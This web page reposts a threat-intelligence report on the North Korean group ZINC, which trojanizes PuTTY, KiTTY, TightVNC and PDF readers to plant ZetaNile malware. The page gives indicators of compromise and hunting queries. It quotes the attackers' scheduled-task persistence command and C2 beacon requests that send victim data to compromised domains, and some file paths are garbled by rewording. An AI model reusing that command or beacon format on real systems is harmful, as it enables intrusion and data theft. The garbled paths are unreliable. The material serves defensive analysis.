Skip to content

The use of ZINC as an open-source software

Corrupted open-source software enters the Russian battlefield | ZDNET

Microsoft has recently discovered a variety of social engineering activities by an actor we trace as ZINC that weaponized legal open-source software. In the US, UK, India, and Russia, the Microsoft Threat Intelligence Center (MSTIC) has detected activities aimed against employees of businesses in a variety of industries, including media, defense and aerospace, and IT services. ZINC, a state-sponsored organization based in North Korea with goals centered on espionage, data theft, financial gain, and network devastation, is the group MSTIC most confidently links this campaign to based on the observed tradecraft, infrastructure, tooling, and account affiliations.

Starting in June 2022, ZINC used conventional social engineering techniques by initially establishing connections with people on LinkedIn to build trust with their targets. After establishing a link, ZINC urged users to keep in touch using WhatsApp, which served as the vehicle for spreading their malicious payloads.

MSTIC saw ZINC using a variety of open-source programs, such as the installers for muPDF/Subliminal Recording, Sumatra PDF Reader, KiTTY, TightVNC, PuTTY, and KiTTY, to carry out these assaults. ZINC was seen making an effort to migrate laterally and exfiltrate data from target networks. Since June 2022, the actors have successfully compromised some organizations. Mandiant also reported on the ongoing campaign with the weaponized PuTTY earlier last month. ZINC might represent a serious threat to people and organizations across all industries and countries because of the widespread use of the platforms and software it uses in its campaign.

Comprehensive defense against ZINC-specific tools and malware is offered by Microsoft Defender for Endpoint, including ZetaNile. Customers will be able to thoroughly search their environments for pertinent signs with the help of the hunting questions provided at the end of this article. Microsoft directly informs customers who have been targeted or hacked, giving them the information they need to secure their accounts, just like with any observed nation-state actor action.

Who is ZINC?

ZINC is a nation-state activity organization that is highly operational, destructive, and sophisticated. The action group, which has been active since 2009, increased its level of public awareness in 2014 as a result of its successful attack on Sony Pictures Entertainment. Microsoft has identified FoggyBrass and PhantomStar as two of the customized remote access tools (RATs) used by ZINC in their inventory.

ZINC actors have been seen to mostly use spear-phishing, according to Microsoft researchers, but they have also been seen to use social engineering on social networking platforms and targeted website compromises to further their goals. ZINC targets employees of the companies it is trying to infiltrate and attempts to persuade them to open weaponized documents that include dangerous macros or install seemingly innocent apps. Security researchers have also been the targets of targeted attacks on Twitter and LinkedIn.

ZINC assaults seem to be driven by conventional cyberespionage, data theft from individuals and businesses, monetary gain, and corporate network devastation. Increased operational security, sophisticated malware that changes over time, and politically motivated targeting are just a few of the characteristics that ZINC attacks share with state-sponsored activities.

From late April through mid-September 2022, ZINC, also known as Labyrinth Chollima and Black Artemis, was seen carrying out this campaign.

Attack chain diagram of ZINC campaign showing steps and related activities
Figure 1. Attack flow diagram for the recent ZINC campaign

ZINC: Observed actor activity

Impersonation and establishing contact

ZINC was discovered by LinkedIn Threat Prevention and Defense making fake accounts pretending to be recruiters for tech, defense, and media entertainment businesses to divert targets away from LinkedIn and into the secure messaging platform WhatsApp for the distribution of malware. Engineers and technical support staff employed by media and IT businesses with locations in the US, UK, and India were the main targets of ZINC. Targets got outreach that was specific to their industry or educational background and were urged to apply for a position at one of several reputable businesses. LinkedIn quickly canceled any accounts connected to fraudulent or dishonest behavior for accounts uncovered in these assaults in compliance with its policy.

Fraudulent recruiter profile
Figure 2. Fraudulent recruiter profile

Multiple methods used for delivery of ZetaNile

The ZetaNile virus family has been identified as the source of at least five techniques of malware open-source apps that contain harmful payloads and shellcode. The ZetaNile implants, also referred to as BLINDINGCAN, have been discussed in reports from CISA and JPCERT. The implant DLLs of the ZetaNile malware family are either encrypted with unique algorithms or loaded with commercial software protectors like Themida and VMProtect.

Figure 3 illustrates how the malicious DLL’s payload is decrypted using a special key that is given during the DLL search order hijacking of the genuine Windows process. The ZetaNile implants send command and control (C2) HTTP requests to known exploited C2 domains using special proprietary encryption techniques or AES encryption. These C2 communications can blend in with normal traffic by encoding the victim information in the parameters for popular keywords like game type or bbs in the HTTP POSTs.

The weaponization of SSH clients with ZINC

ZINC operationalized malicious versions of the SSH clients PuTTY and KiTTY, which served as the entry point for the ZetaNile implant, after connecting to their target. Both applications offer terminal emulator support for many networking protocols, which attracts users who are usually the targets of ZINC. The weaponized versions were usually sent as ISO or ZIP compressed archives. The recipient will find a ReadMe.txt file and an executable program inside that archive. Running the bundled executable does not remove the ZetaNile implant as part of the advancement of ZINC’s malware development and an effort to bypass conventional defenses. The IP specified in the ReadMe.txt file is required by the SSH software for ZetaNile to be deployed. Below is a sample of what that file might contain:

Server: 137[.]184[.]15[.]189
User: [redacted]
Pass: [redacted]

Weaponized PuTTY malware

For many years, ZINC has used malware PuTTY as a component of its attack chain. The most current iteration creates persistence on infected devices by making use of scheduled activities. Mandiant recently alerted them to this activity. The malicious PUTTY.exe is set up to copy C:WindowsSystem32colorcpl.exe to C:ProgramDatacolorcpl.exe after installing the Event Horizon virus in C:ProgramDatacolorui.dll. ZINC can load the second stage malware colurui.dll and decode the payload with the key “0CE1241A44557AA438F27BC6D4ACA246” to be utilized for command and control by exploiting DLL search order hijacking. Once connected to the C2 server, the attackers can use the compromised device to install other malware for different purposes.

As part of the configuration for the weaponized PuTTY, a daily scheduled task called PackageColor is created, establishing persistence. ZINC achieves this with the command shown below:

PuTTY scheduled task as part of persistence
Figure 3. PuTTY – scheduled task as part of persistence

Weaponized KiTTY malware

ZINC has long used a weaponized version of PuTTY, but they have just lately expanded their weapons to include weaponizing KiTTY, a fork of PuTTY. The application gathers the target system’s username and hostname before sending them via TCP/22 to a hardcoded IP address, 172[.]93[.]201[.]253. The malicious KiTTY program decodes numerous times before establishing a successful TCP connection to the server at 137[.]184[.]15[.]189, after which it deploys the malware as %AppData%mscoree.dll. The ZetaNile malware family’s embedded payload, identified as EventHorizon, is the mscoree.dll file. Similar to ZINC’s PuTTY, the actor loads malicious DLL files that operate in the context of these legitimate Windows processes using DLL search order hijacking, notably through %AppData%KiTTY%PresentationHost.exe -EmbeddingObject.

Screenshot of Windows process that ZINC hijacks through DLL search order hijacking
Figure 4. KiTTY – DLL search order hijacking

The mscoree.dll malware is modularized so that, after connecting successfully to the compromised C2 domain, the attackers can add new malware to the target system as necessary by using the C2 communication that is already in place. For example, the attackers could run C:ProgramDataCiscofixmapi.exe -s AudioEndpointBuilder to load malicious mapistub.dll from the C2 server. A unique ID for the field game type and a hardcoded value for the field type are included in the HTTP POST requests, which are used to track malware campaign activity. These features are described below:

POST /wp-includes/php-compat/compat.php HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Host: olidhealth[.]com
Connection: Keep-Alive
Cache-Control: no-cache  

gametype=[UniqueId]&type=O8Akm8aV09Nw412KoWJds

Weaponized TightVNC Viewer

ZINC was discovered using a trojanized TightVNC Viewer that was sent to a target together with a weaponized SSH tool over WhatsApp starting in September 2022. The PDBPath for this malware is special:

N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb

The weaponized versions of TightVNC Viewer were frequently distributed via online services like WhatsApp as compressed ZIP archives or job description-themed ISO files. The recipient will find a ReadMe.txt file and an executable program inside that archive. The following is in the text file (.txt):

Platform: 2nd from the list
User: [redacted]
Pass: [redacted]

The malicious TightVNC Viewer has a pre-populated list of remote hosts as part of the threat actor’s most recent malware technique to get past traditional defenses, and it is set up to only install the backdoor when the user chooses ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu, as shown in Figure 5:

Weaponized TightVNC Viewer – user interface
Figure 5. Weaponized TightVNC Viewer – user interface

The malware was set up to establish VNC sessions to the same IP on port TCP/5900 and submit the victim’s username and hostname to IP 44[.]238[.]74[.]84 as part of the victim’s check-in with the C2. The integrated second stage DLL payload from TightVNC.exe is loaded in memory once a successful connection to the server IP has been made in order to start C2 communication to a known compromised domain.

The weaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer with ZINC

Sumatra PDF and muPDF/Subliminal Recording installation are two malicious versions of PDF readers that ZINC has operationalized and which serve as the entry point for the ZetaNile implant. This method of delivery is commonly used in connection with fake job advertising sent to targets looking for employment in the IT and defense industries. The weaponized versions were usually sent in ZIP archives that had been compressed. The recipient will find an executable file inside that archive. The muPDF/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files, in contrast to the malicious Sumatra PDF reader, which is a fully working PDF reader and can load the malicious implant from a false PDF.

Trojanized Sumatra PDF Reader

ZINC has been using SecurePDF.exe, a trojanized version of Sumatra PDF Reader, since at least 2019 and it continues to be special ZINC tradecraft. By loading a weaponized job application-themed PDF file, SecurePDF.exe, a modularized loader, can install the ZetaNile implant. When opened in the Sumatra PDF Reader, the fake PDF is rendered with the header “SPV005”, a decryption key, an encrypted second stage implant payload, and an encrypted decoy PDF.

The victim’s system hostname and device information are sent to a C2 communication server using unique encoding techniques once the second stage malware has been loaded in memory as part of the C2 check-in procedure. Using a C2 connection, the attackers can add more malware as needed to the hacked devices.

SecurePDF interface
Figure 6. SecurePDF interface

Trojanized muPDF/Subliminal Recording installer

Setup.exe is programmed to check for the existence of the file path ISSetupPrerequisitesSetup64.exe and write C:colrctlcolorui.dll to disk after extracting the embedded executable inside setup.exe in the malware version of the muPDF/Subliminal Recording installation. Then it moves ColorCpl.exe from C: WindowsSystem32 to ColorCtrl. The malicious installation generates a new process named C:colorctrlcolorcpl.exe with the input C3A9B30B6A313F289297C9A36730DB6D, which is then supplied to colorui.dll as a decryption key for the second stage of the infection. When a victim checks in, the DLL colorui.dll, which Microsoft is tracking as part of the EventHorizon malware family, is injected into credwiz.exe or iexpress.exe to perform C2 HTTP requests and obtain additional malware.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload] 

Microsoft will keep an eye on ZINC activity and put protections in place for our users. Below is a list of the detections and IOCs that are currently active across all of our security solutions.

Recommended customer actions

The following security considerations can be employed to mitigate the methods the actor used and are stated in the “Observed actor activity” section:

  • Investigate whether they exist in your environment and make an assessment of any potential breaches using the indicators of compromise that are presented.
  • Block incoming traffic from the IPs listed in the table “Indicators of Compromise.”
  • To ensure validity and look into any unusual activity, review all authentication activity for the remote access infrastructure, paying special attention to accounts set up using single-factor authentication.
  • To reduce the risk of credentials being stolen, enable multifactor authentication (MFA) and make sure that it is enforced for any remote connectivity. NOTE: To secure your accounts, Microsoft highly advises all customers to download and use password-less solutions like Microsoft Authenticator.
  • Inform end users about how to avoid getting infected with malware, including how to ignore or delete unusual and unwanted emails that contain ISO attachments. Encourage end users to exercise excellent credential hygiene; restrict access to accounts with local or domain admin rights and enable Microsoft Defender Firewall to stop malware from spreading and being infected.
  • End users should receive instructions on how to secure their private and professional information on social media, filter unwelcome mail, spot spear-phishing emails, and watering holes, and report any unusual behavior or recon attempts.

Indicators of compromise (IOCs)

The list of IOCs found during our investigation is shown below. We advise our customers to look into these indicators in their settings and put detections and protections in place to identify previous relevant activity and stop future attacks on their systems.

Indicator Type Description
Amazon-KiTTY.exe File name  
Amazon_IT_Assessment.iso File name  
IT_Assessment.iso File name  
amazon_assessment_test.iso File name  
SecurePDF.exe File name  
C:\ProgramData\Comms\colorui.dll File path Malicious PuTTY implant
%APPDATA%\KiTTY\mscoree.dll File path Malicious KiTTY implant
172.93.201[.]253 IP address Adversary C2 server
137.184.15[.]189 IP address Adversary SSH server
44.238.74[.]84 IP address Hard-coded VNC Server IP for malicious TightVNC
c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR “C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246” /TN PackageColor /F Scheduled task name Putty.exe – Scheduled task
1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266 SHA-256 Malicious Putty.exe
aaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9 SHA-256 Malicious colorui.dll
63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d SHA-256 Malicious Amazon-Kitty.exe
e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 SHA-256 Malicious KiTTY implant for mscoree.dll
c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf SHA-256 Weaponized Sumatra PDFReader.exe
71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 SHA-256 Weaponized muPDF/Subliminal Recording installer
olidhealth[.]com/wp-includes/php-compat/compat.php Compromised domain  
hurricanepub[.]com/include/include.php Compromised domain  
turnscor[.]com/wp-includes/contacts.php Compromised domain  
elite4print[.]com/support/support.asp Compromised domain  
cats.runtimerec[.]com/db/dbconn.php Compromised domain  
recruitment.raystechserv[.]com/lib/artichow/BarPlotDashboard.object.php Compromised domain  
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39 User agent Hardcoded Kitty.exe UA
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) User agent Hardcoded SecurePDF.exe UA
N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb PDBPath PDBPath for malicious TightVNC
37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334 SHA-256 Malicious TightVNC
14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745 SHA-256 Malicious TightVNC

NOTE: These signs should not be viewed as being all-inclusive for the activity being monitored.

Detections

Microsoft Defender Antivirus

Customers of Microsoft Defender Antivirus and Microsoft Defender for Endpoints should pay attention to behavior associated with these attacks under the following family names:

  • ZetaNile
  • EventHorizon
  • FoggyBrass
  • PhantomStar

Microsoft Defender for Endpoint

The activities linked to this threat may be indicated by the following Microsoft Defender for Endpoint alerts. However, these alerts might also be set off by unrelated threat activities.

  • Suspicious Task Scheduler activity
  • Suspicious connection to remote service
  • A suspicious file was observed
  • An executable loaded an unexpected dll
  • Possible theft of remote session credentials
  • Suspicious connection to remote service

Microsoft 365 Defender

Customers of Microsoft 365 Defender can use the following advanced hunting queries to find connected activity:

  • Suspicious mapistub.dll file creation

Look for PresentationHost.exe when it creates mapistub.dll since it will likely be used in attacks that hijack DLL search order.

DeviceFileEvents
| where InitiatingProcessFileName =~ "presentationhost.exe"
| where FileName =~ "mapistub.dll"
  • Suspicious mscoree.dll file creation

Analyze any mscoree.dll instances PuTTY processes have produced.

DeviceFileEvents
| where InitiatingProcessFileName hassuffix "kitty.exe" or InitiatingProcessVersionInfoInternalFileName has "PuTTY"
| where FileName =~ "mscoree.dll"
  • Suspicious colorcpl.exe image load

Surface instances of a DLL search order hijacking attack include the colorcpl.exe process loading colorui.dll in a path other than the one expected.

DeviceImageLoadEvents 
| where InitiatingProcessFileName =~ "colorcpl.exe"
| where FileName =~ "colorui.dll" and not(FolderPath has_any("system32", "syswow64", "program files"))

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com